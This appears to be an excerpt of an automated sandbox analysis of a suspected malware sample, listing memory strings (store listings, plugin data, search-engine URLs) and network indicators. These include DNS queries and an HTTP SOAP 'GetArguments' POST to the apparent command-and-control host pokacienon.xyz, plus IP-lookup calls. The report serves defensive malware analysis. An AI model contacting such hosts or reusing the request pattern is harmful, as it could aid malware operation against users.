","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.442380240.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","SkuTitle":"Messenger","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","WuCategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64"],"Capabilities":["runFullTrust","internetClient","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":137845484,"PackageFormat":"Appx","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","MainPackageFamilyNameForDlc":null,"PackageFullName":"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt","PackageId":"9f0b5036-3839-33f0-1d64-45190b6cc3d7-X64","PackageRank":30002,"PlatformDependencies":[{"MaxTested":2814750970478592,"MinVersion":2814750438195200,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt\",\"content.productId\":\"3219d30d-4a23-4f58-a91c-c44b04e6a0c7\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750970478592,\"platform.minVersion\":2814750438195200,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Social\",\"optOut.backu

Source: unknown

DNS traffic detected: queries for: pokacienon.xyz

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: pokacienon.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://bitbucket.org
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/Di
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
Source: svchost.exe, 0000000F.00000002.465143551.00000221A38D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
